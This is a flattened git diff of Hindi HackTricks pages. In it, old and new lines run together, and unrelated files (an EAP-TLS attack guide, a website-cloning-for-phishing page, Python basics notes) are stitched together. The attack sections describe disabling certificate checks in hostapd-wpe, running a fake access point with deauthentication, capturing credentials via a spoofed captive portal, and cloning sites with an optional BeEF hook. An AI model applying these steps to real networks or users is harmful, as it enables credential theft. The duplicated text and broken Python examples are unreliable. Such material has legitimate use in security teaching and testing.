<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें**, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना! **बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
किसी समय मुझे नीचे पोस्ट द्वारा प्रस्तावित समाधान का उपयोग करने की आवश्यकता पड़ी, लेकिन [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) में दिए गए चरण मॉडर्न काली (2019v3) में काम नहीं कर रहे थे।\ किसी समय मुझे नीचे पोस्ट द्वारा प्रस्तावित समाधान का उपयोग करने की आवश्यकता पड़ी, लेकिन [https://github.com/OpenSecurityResearch/hostapd-wpe](https://github.com/OpenSecurityResearch/hostapd-wpe) में दिए गए चरण मॉडर्न काली (2019v3) में काम नहीं कर रहे थे।\
फिर भी, उन्हें काम कराना आसान था।\ फिर भी, उन्हें काम करने में आसान है।\
आपको केवल यहाँ से hostapd-2.6 डाउनलोड करने की आवश्यकता है: [https://w1.fi/releases/](https://w1.fi/releases/) और पुनः hostapd-wpe कंपाइल करने से पहले इंस्टॉल करें: `apt-get install libssl1.0-dev` आपको केवल यहाँ से hostapd-2.6 डाउनलोड करने की आवश्यकता है: [https://w1.fi/releases/](https://w1.fi/releases/) और पुनः hostapd-wpe कंपाइल करने से पहले इंस्टॉल करें: `apt-get install libssl1.0-dev`
### वायरलेस नेटवर्क्स में EAP-TLS का विश्लेषण और शोषण ### वायरलेस नेटवर्क में EAP-TLS का विश्लेषण और शोषण
#### पृष्ठभूमि: वायरलेस नेटवर्क्स में EAP-TLS #### पृष्ठभूमि: वायरलेस नेटवर्क में EAP-TLS
EAP-TLS एक सुरक्षा प्रोटोकॉल है जो प्रमाणपत्रों का उपयोग करके क्लाइंट और सर्वर के बीच सापेक्ष प्रमाणीकरण प्रदान करता है। कनेक्शन केवल तब स्थापित होता है अगर क्लाइंट और सर्वर एक-दूसरे के प्रमाणपत्रों का प्रमाणीकरण करते हैं। EAP-TLS एक सुरक्षा प्रोटोकॉल है जो प्रमाणीकरण प्रदान करता है जो सर्टिफिकेट का उपयोग करके क्लाइंट और सर्वर के बीच सामंजस्यपूर्ण प्रमाणीकरण प्रदान करता है। कनेक्शन केवल तब स्थापित होता है अगर क्लाइंट और सर्वर एक-दूसरे के सर्टिफिकेटों का प्रमाणीकरण करते हैं।
#### चुनौती #### चुनौती का सामना
मूल्यांकन के दौरान, `hostapd-wpe` टूल का उपयोग करते समय एक दिलचस्प त्रुटि का सामना किया गया। टूल ने क्लाइंट कनेक्शन को अस्वीकार कर दिया क्योंकि क्लाइंट का प्रमाणपत्र एक अज्ञात प्रमाणपत्रिका प्राधिकरण (CA) द्वारा हस्ताक्षरित था। इससे पता चला कि क्लाइंट ने नकली सर्वर के प्रमाणपत्र को विश्वसनीय मानते थे, जो क्लाइंट साइड पर ढीली सुरक्षा विन्यासों की ओर इशारा कर रहा था। मूल्यांकन के दौरान, `hostapd-wpe` टूल का उपयोग करते समय एक दिलचस्प त्रुटि का सामना किया गया। टूल ने क्लाइंट कनेक्शन को अस्वीकार कर दिया क्योंकि क्लाइंट का सर्टिफिकेट एक अज्ञात प्रमाण प्राधिकरण (CA) द्वारा हस्ताक्षरित था। इससे पता चला कि क्लाइंट ने नकली सर्वर के सर्टिफिकेट पर विश्वास किया था, जो क्लाइंट की ओर से ढीली सुरक्षा विन्यासों की ओर इशारा कर रहा था।
#### उद्देश्य: मैन-इन-द-मिडिल (MiTM) हमला सेटअप #### उद्देश्य: मैन-इन-द-मिडिल (MiTM) हमला सेटअप करना
लक्ष्य यह था कि टूल को संशोधित किया जाए ताकि किसी भी क्लाइंट प्रमाणपत्र को स्वीकार किया जा सके। यह नकली वायरलेस नेटवर्क से कनेक्शन स्थापित करने और एक MiTM हमला संभवतः प्लेइनटेक्स्ट क्रेडेंशियल्स या अन्य संवेदनशील डेटा को कैप्चर करने की अनुमति देगा। लक्ष्य यह था कि टूल को संशोधित किया जाए ताकि किसी भी क्लाइंट सर्टिफिकेट को स्वीकार किया जा सके। यह नकली वायरलेस नेटवर्क के साथ कनेक्शन स्थापित करने और एक MiTM हमला संभवतः प्लेइनटेक्स्ट क्रेडेंशियल्स या अन्य संवेदनशील डेटा को कैप्चर करने की अनुमति देगा।
#### समाधान: `hostapd-wpe` को संशोधित करना #### समाधान: `hostapd-wpe` को संशोधित करना
`hostapd-wpe` के स्रोत कोड का विश्लेषण ने दिखाया कि क्लाइंट प्रमाणपत्र मान्यता को नियंत्रित करने वाला एक पैरामीटर (`verify_peer`) OpenSSL फ़ंक्शन `SSL_set_verify` में था। इस पैरामीटर के मान को 1 से (मान्यता देना) 0 पर (मान्यता न देना) बदलकर, टूल को किसी भी क्लाइंट प्रमाणपत्र को स्वीकार करने के लिए बनाया गया था। `hostapd-wpe` के स्रोत कोड का विश्लेषण उज्ज्वल किया कि क्लाइंट सर्टिफिकेट प्रमाणीकरण को एक पैरामीटर (`verify_peer`) द्वारा नियंत्रित किया गया था जो OpenSSL फ़ंक्शन `SSL_set_verify` में था। इस पैरामीटर के मान को 1 (प्रमाणीकरण) से 0 (प्रमाणीकरण न करें) में बदलकर, टूल को किसी भी क्लाइंट सर्टिफिकेट को स्वीकार करने के लिए बनाया गया था।
#### हमले का क्रियान्वयन #### हमले का क्रियान्वयन
1. **पर्यावरण जांच:** वायरलेस नेटवर्क्स को मॉनिटर करने और लक्ष्यों की पहचान के लिए `airodump-ng` का उपयोग करें। 1. **पर्यावरण की जाँच:** वायरलेस नेटवर्कों को मॉनिटर करने और लक्ष्यों की पहचान के लिए `airodump-ng` का उपयोग करें।
2. **नकली एपी सेटअप:** संशोधित `hostapd-wpe` चलाएं ताकि लक्ष्य नेटवर्क की नकली एक्सेस प्वाइंट (AP) बनाई जा सके। 2. **नकली एपी सेटअप:** संशोधित `hostapd-wpe` को चलाएं ताकि लक्ष्य नेटवर्क की नकली एक्सेस प्वाइंट (AP) बनाई जा सके।
3. **कैप्टिव पोर्टल कस्टमाइजेशन:** कैप्टिव पोर्टल के लॉगिन पेज को मान्य और लक्ष्य उपयोगकर्ता के लिए परिचित दिखाने के लिए अनुकूलित करें। 3. **कैप्टिव पोर्टल कस्टमाइजेशन:** कैप्टिव पोर्टल के लॉगिन पेज को मान्य और लक्ष्य उपयोगकर्ता के लिए परिचित दिखाने के लिए अनुकूलित करें।
4. **डी-ऑथेंटिकेशन हमला:** वैकल्पिक रूप से, वास्तविक नेटवर्क से क्लाइंट को डिस्कनेक्ट करने और उन्हें नकली एपी से कनेक्ट करने के लिए डी-ऑथ हमला करें 4. **डी-ऑथेंटिकेशन हमला:** वैकल्पिक रूप से, एक डी-ऑथ हमला करें ताकि क्लाइंट को वास्तविक नेटवर्क से डिस्कनेक्ट किया जा सके और उन्हें नकली एपी से कनेक्ट किया जा सके
5. **क्रेडेंशियल्स कैप्चरिंग:** जब क्लाइंट नकली एपी से कनेक्ट होता है और कैप्टिव पोर्टल के साथ इंटरैक्ट करता है, तो उनके क्रेडेंशियल्स कैप्चर होते हैं। 5. **क्रेडेंशियल्स कैप्चर करना:** एक बार क्लाइंट नकली एपी से कनेक्ट होता है और कैप्टिव पोर्टल के साथ इंटरैक्ट करता है, उनके क्रेडेंशियल्स कैप्चर हो जाते हैं।
#### हमले से अवलोकन #### हमले से अवलोकन
- विंडोज मशीनों पर, सिस्टम स्वचालित रूप से नकली एपी से कनेक्ट हो सकता है, जब वेब नेविगेशन का प्रयास किया जाता है तो कैप्टिव पोर्टल प्रस्तुत किया जा सकता है। - विंडोज मशीनों पर, सिस्टम स्वचालित रूप से नकली एपी से कनेक्ट हो सकता है, जब वेब नेविगेशन का प्रयास किया जाता है तो कैप्टिव पोर्टल प्रस्तुत किया जा सकता है।
- एक iPhone पर, उपयोगकर्ता को एक नया प्रमाणपत्र स्वीकार करने के लिए प्रोत्साहित किया जा सकता है और फिर कैप्टिव पोर्टल प्रस्तुत किया जा सकता है। - एक iPhone पर, उपयोगकर्ता को एक नया सर्टिफिकेट स्वीकार करने के लिए प्रोत्साहित किया जा सकता है और फिर कैप्टिव पोर्टल प्रस्तुत किया जा सकता है।
#### निष्कर्ष #### निष्कर्ष
हालांकि EAP-TLS को सुरक्षित माना जाता है, इसकी प्रभावशीलता अंत उपयोगकर्ताओं के सही विन्यास और सतर्क व्यवहार पर निर्भर करती है। गलत रूप से विन्यस्त उपकरण या अनजाने उपयोगकर्ता नकली प्रमाणपत्रों को स्वीकार करने से EAP-TLS सुरक्षित नेटवर्क की सुरक्षा को कमजोर कर सकते हैं। हालांकि EAP-TLS को सुरक्षित माना जाता है, इसकी प्रभावकारिता मुख्य रूप से सही विन्यास और अंत उपयोगकर्ताओं के सतर्क व्यवहार पर निर्भर करती है। गलत रूप से कॉन्फ़िगर किए गए उपकरण या अनजाने में रोगी स्वीकार करने से EAP-TLS से सुरक्षा को खतरे में डाल सकते हैं।
अधिक विवरण के लिए देखें https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/ अधिक विवरण के लिए देखें https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/
@ -57,14 +58,10 @@ EAP-TLS एक सुरक्षा प्रोटोकॉल है जो
* [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/) * [https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/](https://versprite.com/blog/application-security/eap-tls-wireless-infrastructure/)
<img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\ <img src="../../.gitbook/assets/i3.png" alt="" data-size="original">\
**बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप करें**, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना! **बग बाउंटी टिप**: **Intigriti** के लिए **साइन अप** करें, एक प्रीमियम **बग बाउंटी प्लेटफॉर्म जो हैकर्स द्वारा बनाई गई है**! हमारे साथ जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) आज ही, और शुरू करें बाउंटी अप तक **$100,000** तक कमाना!
{% embed url="https://go.intigriti.com/hacktricks" %} {% embed url="https://go.intigriti.com/hacktricks" %}
<details> {% hint style="success" %}
**AWS हैकिंग सीखें और अभ्यास करें:**<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> **
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks

View file

@ -1,16 +1,17 @@
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ</strong>!</summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** पर फॉलो करें 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें और PRs सबमिट करें** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure> <figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
@ -20,9 +21,9 @@ HackTricks का समर्थन करने के अन्य तरी
फिशिंग मूल्यांकन के लिए कभी-कभी पूरी तरह से **एक वेबसाइट क्लोन** करना उपयोगी हो सकता है। फिशिंग मूल्यांकन के लिए कभी-कभी पूरी तरह से **एक वेबसाइट क्लोन** करना उपयोगी हो सकता है।
ध्यान दें कि आप क्लोन की गई वेबसाइट में कुछ payloads भी जोड़ सकते हैं जैसे एक BeEF हुक ताकि उपयोगकर्ता के टैब को "नियंत्रित" किया जा सके। ध्यान दें कि आप क्लोन की गई वेबसाइट में कुछ पेयलोड भी जोड़ सकते हैं जैसे एक बीईईएफ हुक ताकि उपयोगकर्ता के टैब को "नियंत्रित" किया जा सके।
इस उद्देश्य के लिए आप विभिन्न उपकरणों का उपयोग कर सकते हैं: इस उद्देश्य के लिए आप विभिन्न उपकरण प्रयोग कर सकते हैं:
## wget ## wget
```text ```text
@ -33,7 +34,7 @@ wget -mk -nH
#https://github.com/imthaghost/goclone #https://github.com/imthaghost/goclone
goclone <url> goclone <url>
``` ```
## सोशल इंजीनियरिंग टूलकिट ## सामाजिक इंजीनियरिंग टूलकिट
```bash ```bash
#https://github.com/trustedsec/social-engineer-toolkit #https://github.com/trustedsec/social-engineer-toolkit
``` ```
@ -42,16 +43,17 @@ goclone <url>
{% embed url="https://websec.nl/" %} {% embed url="https://websec.nl/" %}
{% hint style="success" %}
सीखें और प्रैक्टिस करें AWS हैकिंग:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
दूसरे तरीके HackTricks का समर्थन करने के लिए: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) जांचें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर हमें **फॉलो** करें।
* अगर आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}

View file

@ -1,30 +1,31 @@
# मूल Python # मूल Python
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें **@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सदस्यता योजनाएं देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स**](https://github.com/carlospolop/hacktricks) और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके।
</details> </details>
{% endhint %}
## Python Basics ## Python Basics
### उपयोगी जानकारी ### उपयोगी जानकारी
list(xrange()) == range() --> Python3 में range Python2 का xrange है (यह एक सूचकक है न कि एक सूची)\ list(xrange()) == range() --> Python3 में range python2 का xrange है (यह एक सूचककर्ता है न कि एक सूची)\
एक Tuple और एक List के बीच अंतर यह है कि एक Tuple में एक मान की स्थिति का मतलब होता है लेकिन सूचियों में केवल क्रमबद्ध मान होते हैं। Tuples में संरचनाएँ होती हैं लेकिन सूचियों में क्रम होता है। एक Tuple और एक List के बीच अंतर यह है कि एक मान की स्थिति एक Tuple में उसे अर्थ देती है लेकिन सूचियों में केवल क्रमबद्ध मान होते हैं। Tuples में संरचनाएँ होती हैं लेकिन सूचियों में क्रम होता है।
### मुख्य ऑपरेशन ### मुख्य क्रियाएँ
एक संख्या को उठाने के लिए आप इस्तेमाल करते हैं: 3\*\*2 (नहीं 3^2)\ एक संख्या को उठाने के लिए आप इस्तेमाल करते हैं: 3\*\*2 (नहीं 3^2)\
यदि आप 2/3 करते हैं तो यह 1 लौटाता है क्योंकि आप दो ints (पूर्णांक) को विभाजित कर रहे हैं। यदि आप दशमलव चाहते हैं तो आपको floats से विभाजित करना चाहिए (2.0/3.0)।\ यदि आप 2/3 करते हैं तो यह 1 लौटाता है क्योंकि आप दो ints (पूर्णांक) को विभाजित कर रहे हैं। यदि आप दशमलव चाहते हैं तो आपको floats (2.0/3.0) को विभाजित करना चाहिए।\
i >= j\ i >= j\
i <= j\ i <= j\
i == j\ i == j\
@ -89,62 +90,62 @@ for i in range(0,100):
for letter in "hola": for letter in "hola":
#something with a letter in "hola" #something with a letter in "hola"
``` ```
### टपल्स ### Tuples
t1 = (1,'2,'three')\ t1 = (1, '2', 'तीन')\
t2 = (5,6)\ t2 = (5, 6)\
t3 = t1 + t2 = (1, '2', 'three', 5, 6)\ t3 = t1 + t2 = (1, '2', 'तीन', 5, 6)\
(4,) = Singelton\ (4,) = सिंगलटन\
d = () empty tuple\ d = () खाली टपल\
d += (4,) --> एक टपल में जोड़ें\ d += (4,) --> टपल में जोड़ें\
CANT! --> t1\[1] == 'New value'\ CANT! --> t1\[1] == 'नया मान'\
list(t2) = \[5,6] --> टपल से सूची में list(t2) = \[5, 6] --> टपल से सूची में
### सूची (एरे) ### List (array)
d = \[] empty\ d = \[] खाली\
a = \[1,2,3]\ a = \[1, 2, 3]\
b = \[4,5]\ b = \[4, 5]\
a + b = \[1,2,3,4,5]\ a + b = \[1, 2, 3, 4, 5]\
b.append(6) = \[4,5,6]\ b.append(6) = \[4, 5, 6]\
tuple(a) = (1,2,3) --> सूची से टपल में tuple(a) = (1, 2, 3) --> सूची से टपल में
### शब्दकोश ### Dictionary
d = {} empty\ d = {} खाली\
monthNumbers={1:Jan, 2: feb,feb:2}—> monthNumbers ->{1:Jan, 2: feb,feb:2}\ monthNumbers={1:'जनवरी', 2: 'फरवरी','फरवरी':2}—> monthNumbers ->{1:'जनवरी', 2: 'फरवरी','फरवरी':2}\
monthNumbers\[1] = Jan\ monthNumbers\[1] = 'जनवरी'\
monthNumbers\[feb] = 2\ monthNumbers\['फरवरी'] = 2\
list(monthNumbers) = \[1,2,feb]\ list(monthNumbers) = \[1, 2, 'फरवरी']\
monthNumbers.values() = \[Jan,feb,2]\ monthNumbers.values() = \['जनवरी', 'फरवरी', 2]\
keys = \[k for k in monthNumbers]\ keys = \[k for k in monthNumbers]\
a={'9':9}\ a={'9':9}\
monthNumbers.update(a) = {'9':9, 1:Jan, 2: feb,feb:2}\ monthNumbers.update(a) = {'9':9, 1:'जनवरी', 2: 'फरवरी','फरवरी':2}\
mN = monthNumbers.copy() #Independent copy\ mN = monthNumbers.copy() #स्वतंत्र प्रतिलिपि\
monthNumbers.get('key',0) #Check if key exists, Return value of monthNumbers\["key"] or 0 if it does not exists monthNumbers.get('कुंजी',0) #कुंजी मौजूद है या नहीं जांचें, monthNumbers\["कुंजी"] का मान लौटाएं या अगर यह मौजूद नहीं है तो 0
### सेट ### Set
सेट में पुनरावृत्तियाँ नहीं होतीं हैं\ सेट में पुनरावृत्तियाँ नहीं होतीं हैं\
myset = set(\['a', 'b']) = {'a', 'b'}\ myset = set(\['ए', 'बी']) = {'ए', 'बी'}\
myset.add('c') = {'a', 'b', 'c'}\ myset.add('सी') = {'ए', 'बी', 'सी'}\
myset.add('a') = {'a', 'b', 'c'} #कोई पुनरावृत्ति नहीं\ myset.add('ए') = {'ए', 'बी', 'सी'} #कोई पुनरावृत्ति नहीं\
myset.update(\[1,2,3]) = set(\['a', 1, 2, 'b', 'c', 3])\ myset.update(\[1, 2, 3]) = set(\['ए', 1, 2, 'बी', 'सी', 3])\
myset.discard(10) #यदि मौजूद है, तो हटा दें, अगर नहीं, तो कुछ नहीं\ myset.discard(10) #यदि मौजूद है, तो हटाएं, अगर नहीं, कुछ नहीं\
myset.remove(10) #यदि मौजूद है, तो हटा दें, अगर नहीं, तो अपशिष्ट उठाएं\ myset.remove(10) #यदि मौजूद है, तो हटाएं, अगर नहीं, त्रुटि उठाएं\
myset2 = set(\[1, 2, 3, 4])\ myset2 = set(\[1, 2, 3, 4])\
myset.union(myset2) #मेरे सेट या myset2 में मान\ myset.union(myset2) #मान myset या myset2 में\
myset.intersection(myset2) #मेरे सेट और myset2 में मान\ myset.intersection(myset2) #myset और myset2 में मान\
myset.difference(myset2) #मेरे सेट में मान लेकिन myset2 में नहीं\ myset.difference(myset2) #myset में मान लेकिन myset2 में नहीं\
myset.symmetric\_difference(myset2) #वह मान जो मेरे सेट और myset2 में नहीं हैं (दोनों में नहीं)\ myset.symmetric\_difference(myset2) #वह मान जो myset और myset2 में नहीं हैं (दोनों में नहीं)\
myset.pop() #सेट का पहला तत्व प्राप्त करें और हटा दें\ myset.pop() #सेट का पहला तत्व प्राप्त करें और हटां\
myset.intersection\_update(myset2) #myset = मेरे सेट और myset2 में तत्व\ myset.intersection\_update(myset2) #myset = myset और myset2 में तत्व\
myset.difference\_update(myset2) #myset = मेरे सेट में तत्व लेकिन myset2 में नहीं\ myset.difference\_update(myset2) #myset = myset में तत्व लेकिन myset2 में नहीं\
myset.symmetric\_difference\_update(myset2) #myset = उन तत्वों को जो दोनों में नहीं हैं myset.symmetric\_difference\_update(myset2) #myset = उन तत्वों को जो दोनों में नहीं हैं
### कक्षाएँ ### Classes
\_\_It\_\_ में वाला विधि उसे तुलना करने के लिए उपयोग किया जाएगा यदि इस कक्षा के एक ऑब्जेक्ट दूसरे से बड़ा है \_\_It\_\_ में वाला विधि उसे तुलना करने के लिए उपयोग किया जाएगा कि क्या इस कक्षा का एक ऑब्जेक्ट दूसरे से बड़ा है
```python ```python
class Person(name): class Person(name):
def __init__(self,name): def __init__(self,name):
@ -172,19 +173,19 @@ MITPerson.nextIdNum += 1 #Attribute of the class +1
def __it__(self, other): def __it__(self, other):
return self.idNum < other.idNum return self.idNum < other.idNum
``` ```
### map, zip, filter, lambda, sorted और one-liners ### मैप, ज़िप, फ़िल्टर, लैम्बडा, सॉर्टेड और वन-लाइनर्स
**Map** इसके जैसा है: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\ **Map** इसके जैसा है: \[f(x) for x in iterable] --> map(tutple,\[a,b]) = \[(1,2,3),(4,5)]\
m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True] m = map(lambda x: x % 3 == 0, \[1, 2, 3, 4, 5, 6, 7, 8, 9]) --> \[False, False, True, False, False, True, False, False, True]
**zip** उस समय रुकता है जब foo या bar में से छोटा हो जाता है: **Zip** उस समय रुकता है जब foo या bar में से छोटा हो जाता है:
``` ```
for f, b in zip(foo, bar): for f, b in zip(foo, bar):
print(f, b) print(f, b)
``` ```
**लैम्बडा** का उपयोग एक फ़ंक्शन को परिभाषित करने के लिए किया जाता है\ **लैम्बडा** का उपयोग एक फ़ंक्शन को परिभाषित करने के लिए किया जाता है\
(lambda x,y: x+y)(5,3) = 8 --> लैम्बडा का उपयोग सरल **फ़ंक्शन** के रूप में करें\ (lambda x,y: x+y)(5,3) = 8 --> लैम्बडा का उपयोग एक सरल **फ़ंक्शन** के रूप में करें\
**sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> लैम्बडा का उपयोग सूची को क्रमबद्ध करने के लिए करें\ **sorted**(range(-5,6), key=lambda x: x\*\* 2) = \[0, -1, 1, -2, 2, -3, 3, -4, 4, -5, 5] --> लैम्बडा का उपयोग एक सूची को क्रमबद्ध करने के लिए करें\
